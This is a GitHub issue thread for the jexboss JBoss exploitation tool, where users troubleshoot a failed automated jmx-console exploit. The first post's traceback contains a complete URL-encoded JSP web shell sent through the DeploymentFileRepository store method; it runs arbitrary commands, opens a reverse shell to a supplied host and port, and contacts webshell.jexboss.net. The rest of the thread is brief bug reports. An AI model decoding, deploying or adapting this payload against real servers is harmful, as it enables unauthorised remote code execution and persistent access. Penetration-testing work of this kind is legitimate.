Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

BadStatusLine("''",) #24

Open
mraczdrekuga opened this issue Dec 5, 2016 · 3 comments
Open

BadStatusLine("''",) #24

mraczdrekuga opened this issue Dec 5, 2016 · 3 comments

Comments

@mraczdrekuga
Copy link

Hi, on:

Python 2.7.12 (default, Nov  7 2016, 11:55:55) 
[GCC 6.2.1 20160830] on linux2

after:

/opt/jexboss:
> sudo pip install -r requires.txt 
Requirement already satisfied: urllib3>=1.8 in /usr/lib/python2.7/site-packages (from -r requires.txt (line 1))
Requirement already satisfied: ipaddress in /usr/lib/python2.7/site-packages (from -r requires.txt (line 2))

i've got problem with exploit:

** Checking Host: http://10.0.0.2:8081 **

 * Checking admin-console: 	 [ OK ]
 * Checking web-console: 	 [ VULNERABLE ]
 * Checking jmx-console: 	 [ VULNERABLE ]
 * Checking JMXInvokerServlet: 	 [ VULNERABLE ]

 * Do you want to try to run an automated exploitation via "jmx-console" ?
   This operation will provide a simple command shell to execute commands on the server..
   Continue only if you have permission!
   yes/NO? yes

 * Sending exploit code to http://10.0.0.2:8081. Please wait...

Traceback (most recent call last):
  File "./jexboss.py", line 681, in <module>
    main()
  File "./jexboss.py", line 520, in main
    auto_exploit(url, i)
  File "./jexboss.py", line 303, in auto_exploit
    result = _exploits.exploit_jmx_console_file_repository(url)
  File "/opt/jexboss/_exploits.py", line 176, in exploit_jmx_console_file_repository
    gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
  File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/poolmanager.py", line 244, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 643, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/site-packages/urllib3/util/retry.py", line 363, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='10.0.0.2', port=8081): Max retries exceeded with url: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%6C%61%6E%67%2E%2A%2C%6A%61%76%61%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%63%6C%61%73%73%20%72%76%20%65%78%74%65%6E%64%73%20%54%68%72%65%61%64%7B%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%3B%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%3B%72%76%28%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%2C%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%29%7B%74%68%69%73%2E%69%73%3D%69%73%3B%74%68%69%73%2E%6F%73%3D%6F%73%3B%7D%70%75%62%6C%69%63%20%76%6F%69%64%20%72%75%6E%28%29%7B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%69%6E%3D%6E%75%6C%6C%3B%42%75%66%66%65%72%65%64%57%72%69%74%65%72%20%6F%75%74%3D%6E%75%6C%6C%3B%74%72%79%7B%69%6E%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%74%68%69%73%2E%69%73%29%29%3B%6F%75%74%3D%6E%65%77%20%42%75%66%66%65%72%65%64%57%72%69%74%65%72%28%6E%65%77%20%4F%75%74%70%75%74%53%74%72%65%61%6D%57%72%69%74%65%72%28%74%68%69%73%2E%6F%73%29%29%3B%63%68%61%72%20%62%5B%5D%3D%6E%65%77%20%63%68%61%72%5B%38%31%39%32%5D%3B%69%6E%74%20%6C%3B%77%68%69%6C%65%28%28%6C%3D%69%6E%2E%72%65%61%64%28%62%2C%30%2C%62%2E%6C%65%6E%67%74%68%29%29%3E%30%29%7B%6F%75%74%2E%77%72%69%74%65%28%62%2C%30%2C%6C%29%3B%6F%75%74%2E%66%6C%75%73%68%28%29%3B%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%7D%7D%7D%53%74%72%69%6E%67%20%73%68%3D%6E%75%6C%6C%3B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%21%3D%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%3B%7D%65%6C%73%65%20%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%21%3D%20%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%3B%7D%69%66%28%73%68%20%21%3D%20%6E%75%6C%6C%29%7B%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22%74%65%78%74%2F%68%74%6D%6C%22%29%3B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%3D%6E%75%6C%6C%3B%53%74%72%69%6E%67%20%6C%68%63%3D%28%6E%65%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C%22%2D%22%29%3B%74%72%79%7B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%6E%6F%2D%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%3D%3D%6E%75%6C%6C%29%7B%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%3D%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%29%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%63%2E%73%65%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22%2C%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B%69%66%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%2E%65%78%69%73%74%73%28%29%29%7B%50%72%69%6E%74%57%72%69%74%65%72%20%77%3D%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%3B%77%2E%63%6C%6F%73%65%28%29%3B%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%6C%76%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73%70%6C%69%74%28%22%20%22%29%5B%31%5D%3B%69%66%28%21%6C%76%2E%65%71%75%61%6C%73%28%22%34%22%29%29%7B%6F%75%74%2E%70%72%69%6E%74%28%22%4E%65%77%20%76%65%72%73%69%6F%6E%2E%20%50%6C%65%61%73%65%20%75%70%64%61%74%65%21%22%29%3B%7D%7D%65%6C%73%65%20%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%64%22%29%21%3D%2D%31%7C%7C%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%70%63%6F%6E%66%69%67%22%29%21%3D%2D%31%29%7B%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%46%61%69%6C%65%64%20%74%6F%20%63%68%65%63%6B%20%66%6F%72%20%75%70%64%61%74%65%73%22%29%3B%7D%74%72%79%7B%50%72%6F%63%65%73%73%20%70%3B%62%6F%6F%6C%65%61%6E%20%6E%69%78%3D%74%72%75%65%3B%69%66%28%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%6E%69%78%3D%66%61%6C%73%65%3B%7D%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%6A%65%78%72%65%6D%6F%74%65%3D%22%29%21%3D%2D%31%29%7B%53%6F%63%6B%65%74%20%73%63%3D%6E%65%77%20%53%6F%63%6B%65%74%28%73%68%2E%73%70%6C%69%74%28%22%3D%22%29%5B%31%5D%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2C%49%6E%74%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%73%68%2E%73%70%6C%69%74%28%22%3A%22%29%5B%31%5D%29%29%3B%69%66%28%6E%69%78%29%7B%73%68%3D%22%2F%62%69%6E%2F%62%61%73%68%22%3B%7D%65%6C%73%65%7B%73%68%3D%22%63%6D%64%2E%65%78%65%22%3B%7D%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%73%68%29%3B%28%6E%65%77%20%72%76%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%73%63%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%28%6E%65%77%20%72%76%28%73%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%70%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%7D%65%6C%73%65%7B%69%66%28%6E%69%78%29%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%6E%65%77%20%53%74%72%69%6E%67%5B%5D%7B%22%2F%62%69%6E%2F%62%61%73%68%22%2C%22%2D%63%22%2C%73%68%7D%29%3B%7D%65%6C%73%65%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%7D%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%77%68%69%6C%65%28%64%20%21%3D%20%6E%75%6C%6C%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%29%3B%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%22%29%3B%7D%7D%25%3E&argType=boolean&arg4=True (Caused by ProtocolError('Connection aborted.', BadStatusLine("''",)))

Any clue how prevent this kind of error?
@joaomatosf
Copy link
Owner

Hi friend,

Please, can you run the following command and send me the response?

curl -v http://10.0.0.2:8081

Thank you.

@developmore
Copy link

Hi I got the same problem:

** Checking Host: http://xx.xx.xx.xx **

[] Checking admin-console: [ OK ]
[] Checking Struts2: [ OK ]
[] Checking Servlet Deserialization: [ OK ]
[] Checking Application Deserialization: [ OK ]
[] Checking Jenkins: [ OK ]
[] Checking web-console: [ OK ]
[] Checking jmx-console: [ VULNERABLE ]
[] Checking JMXInvokerServlet: [ OK ]
...
Said yes to exploit...
...
HTTPConnectionPool(host='xx.xx.xx.xx', port=80): Max retries exceeded with url: /jmx-console/HtmlAdap
...
(Caused by <class 'httplib.BadStatusLine'>: '')

Any ideas how to proceed here?

@flypig5211
Copy link

hello!I also have this problem. Is there a solution

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@mraczdrekuga @joaomatosf @developmore @flypig5211